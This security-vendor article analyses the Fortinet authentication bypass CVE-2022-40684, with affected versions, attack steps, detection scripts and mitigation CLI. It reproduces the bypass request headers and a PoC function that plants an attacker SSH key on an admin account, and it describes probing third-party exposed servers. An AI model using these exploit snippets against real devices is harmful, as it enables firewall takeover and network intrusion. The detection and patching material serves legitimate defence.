On Oct. 7, 2022, less than a month after the ProxyNotShell attack that exploited an MS Exchange Server zero-day vulnerability, the Fortinet authentication bypass vulnerability CVE-2022-40684 was disclosed. This vulnerability threatens users of Fortinet products such as FortiGate, FortiProxy and FortiSwitch Manager, and it is especially prevalent in products running firmware version 7.x.

This article analyzes the Fortinet authentication bypass vulnerability in products that, together with Palo Alto, are used by 565,000 customers around the world, and explains how you can check for Fortinet products that are exposed on the internet.

CVE-2022-40684 Fortinet Authentication Bypass Vulnerability Latest Updates

The authentication bypass vulnerability was disclosed to customers on October 7 and soon became known to everyone else through several reports. On Oct. 10, a list of all affected Fortinet products and solutions was released publicly.

Vulnerable Products 

  • FortiOS: version 7.2.0 ~ 7.2.1 and 7.0.0 ~ 7.0.6
  • FortiProxy: version 7.2.0 ~ 7.0.6
  • FortiSwitch Manager: version 7.2.0 and 7.0.0
  • FortiOS: versions 5.x and 6.x are not affected

According to the announcement, attackers were able to obtain user information, the user's public SSH key, trusthost zone and IP, FortiToken, serial number, FortiOS version and more through HTTP/HTTPS requests to the affected product versions. Beyond that, they can also gain access to the product's CLI by sending their own RSA key to the server and hijacking the admin user's SSH key. If they succeed, they can penetrate the internal network, since they now control the management interface.

Order of Attack

  1. Replace the admin user's SSH key with their own key so they can log in once they find a vulnerable server
  2. Add a local user
  3. Access the interface and update networking configurations
  4. Leak other confidential system information through packet capture and interface management pages

Fortinet advised verifying systems immediately. If you find login log entries with user="Local_Process_Access", that is a sign that you should patch and take action immediately.
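As an added example (not code from the article or from Fortinet), the following Python script encodes the affected version ranges listed above and scans FortiOS event logs for the user="Local_Process_Access" indicator. The sample log lines are constructed for illustration, and the FortiProxy range is an assumed reading of the list above.

```python
import re
from typing import List, Tuple

# Affected version ranges as listed in the article (inclusive bounds).
# Assumption: the article's FortiProxy entry "7.2.0 ~ 7.0.6" is read as
# 7.2.0 plus 7.0.0-7.0.6, following the FortiOS layout.
AFFECTED = {
    "FortiOS": [((7, 2, 0), (7, 2, 1)), ((7, 0, 0), (7, 0, 6))],
    "FortiProxy": [((7, 2, 0), (7, 2, 0)), ((7, 0, 0), (7, 0, 6))],
    "FortiSwitchManager": [((7, 2, 0), (7, 2, 0)), ((7, 0, 0), (7, 0, 0))],
}

def parse_version(v: str) -> Tuple[int, int, int]:
    """Turn 'v7.0.5' or '7.0.5,build0304' into a comparable (7, 0, 5) tuple."""
    m = re.match(r"v?(\d+)\.(\d+)\.(\d+)", v.strip())
    if not m:
        raise ValueError(f"unrecognised version string: {v!r}")
    return tuple(int(x) for x in m.groups())

def is_affected(product: str, version: str) -> bool:
    """True if product/version falls inside a range from the advisory list."""
    ver = parse_version(version)
    return any(lo <= ver <= hi for lo, hi in AFFECTED.get(product, []))

# A configuration change made through the bypass is attributed to the
# pseudo-user Local_Process_Access instead of a real administrator account.
LOG_USER = re.compile(r'\buser="Local_Process_Access"')

def find_bypass_indicators(lines: List[str]) -> List[str]:
    """Return the log lines that carry the Local_Process_Access indicator."""
    return [ln for ln in lines if LOG_USER.search(ln)]

# Constructed sample log lines (not real captured logs).
SAMPLE_LOGS = [
    'date=2022-10-12 time=10:01:02 type="event" subtype="system" user="admin" '
    'ui="https(10.0.0.5)" action="edit" cfgpath="system.admin" msg="Edit system.admin"',
    'date=2022-10-12 time=10:03:17 type="event" subtype="system" '
    'user="Local_Process_Access" ui="ssh" action="edit" cfgpath="system.admin" '
    'cfgobj="admin" cfgattr="ssh-public-key1[*]" msg="Edit system.admin admin"',
    'date=2022-10-12 time=10:04:40 type="event" subtype="system" user="admin" '
    'ui="https(10.0.0.5)" action="logout" msg="Administrator admin logged out"',
]

if __name__ == "__main__":
    print("FortiOS 7.0.5 affected:", is_affected("FortiOS", "v7.0.5,build0304"))
    for hit in find_bypass_indicators(SAMPLE_LOGS):
        print("[!] bypass indicator:", hit)
```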

Detect Vulnerable Fortinet Using PoC Code

You can find vulnerable Fortinet servers by making an HTTP/HTTPS request to '/api/v2/cmdb/system/admin' and checking whether system information is leaked.

Send the headers below to bypass authentication.

CVE-2022-40684 PoC Code: https://github.com/carlosevieira/CVE-2022-40684

headers = {
    "user-agent": "Node.js",
    "accept-encoding": "gzip, deflate",
    "Host": "127.0.0.1:9980",
    "forwarded": 'by="[127.0.0.1]:80";for="[127.0.0.1]:49490";proto=http;host=',
    "x-forwarded-vdom": "root",  
}

If you find a vulnerable server, you can gain access by delivering an SSH key with these headers and then logging in over SSH, since authentication is bypassed.

CVE-2022-40684 PoC Code: https://github.com/horizon3ai/CVE-2022-40684

import requests  # third-party HTTP client used by the PoC

# HEADERS is the bypass header dictionary shown above; format_key() comes from
# the same PoC repository and reads the public key file into a single line.
def add_key(target, username, key_file):
    key = format_key(key_file)
    # Body of the PUT request: the key is wrapped in literal double quotes
    j = {
        "ssh-public-key1": '\"' + key + '\"'
        }
    url = f'https://{target}/api/v2/cmdb/system/admin/{username}'
    # verify=False skips TLS certificate validation for self-signed appliances
    r = requests.put(url, headers=HEADERS, json=j, verify=False)
    if 'SSH key is good' not in r.text:
        print(f'[-] {target} is not vulnerable!')
    else:
        print(f'[+] SSH key for {username} added successfully!')

If you send an HTTP/HTTPS request to an exposed Fortinet IP address using the PoC code, you can confirm whether the server is vulnerable.

Operating Fortinet Firewalls Neglected, Immediate Inspections Are Needed

We checked certain Fortinet IPs exposed on the internet for the vulnerability using the publicly released PoC.

As shown in the image below, the username, user rights (read-only, super_admin) and the SSH public key are exposed.

The vulnerable firmware version is 7.2.0, so we know that the product in use is a FortiGate 100E.

CVE-2022-40684 Vulnerability PoC Inspected Results of Fortinet IP Exposed on the Internet

As shown below, the admin's SSH public key is listed as fake-key. From this, we can assume that this server has been affected by the Fortinet authentication bypass vulnerability.

CVE-2022-40684 Vulnerability PoC Inspected Results of Fortinet IP Exposed on the Internet

If you search for the server's IP address on Criminal IP Asset Search, you can see that it is an IP address owned by Microsoft (as_name: MICROSOFT-CORP-MSN-AS-BLOCK).

Criminal IP Search Result of Server Affected by CVE-2022-40684 Fortinet Authentication Bypass Vulnerability

CVE-2022-40684 Fortinet Authentication Bypass Vulnerability Security Check  

The CVE-2022-40684 Fortinet authentication bypass vulnerability received a CVSS v3 score of 9.8. Despite Fortinet's patch recommendations, many servers around the world are still running a vulnerable firewall.
This vulnerability gives access to the firewall CLI through an authentication bypass, so it is dangerous not only for externally facing servers but also for servers operating internally. Applying the security update is strongly recommended. If the OS version update is difficult, restrict IP access to the HTTP/HTTPS administrative interface or disable the interface itself.
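As an added example (not from the article or from Fortinet's advisory), the two interim mitigations above expressed as FortiOS CLI configuration. The admin account name "admin", the management network 10.0.0.0/24 and the interface name "wan1" are assumed placeholders to be replaced with your own values:

```text
# Restrict the admin account to a trusted management network only
# (assumed: account "admin", management network 10.0.0.0/24)
config system admin
    edit "admin"
        set trusthost1 10.0.0.0 255.255.255.0
    next
end

# Drop HTTP/HTTPS administrative access from the internet-facing interface
# (assumed interface name "wan1"); only the services listed stay allowed
config system interface
    edit "wan1"
        set allowaccess ping ssh
    next
end
```

Keeping ssh in allowaccess still leaves SSH management reachable on that interface; remove it too where SSH administration is not needed from there, and apply the trusthost restriction to every administrator account, not only "admin".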

Check out our article from last month on how to detect and analyze servers exposed by the MS Exchange zero-day vulnerability.


Source : Criminal IP (https://www.criminalip.io)
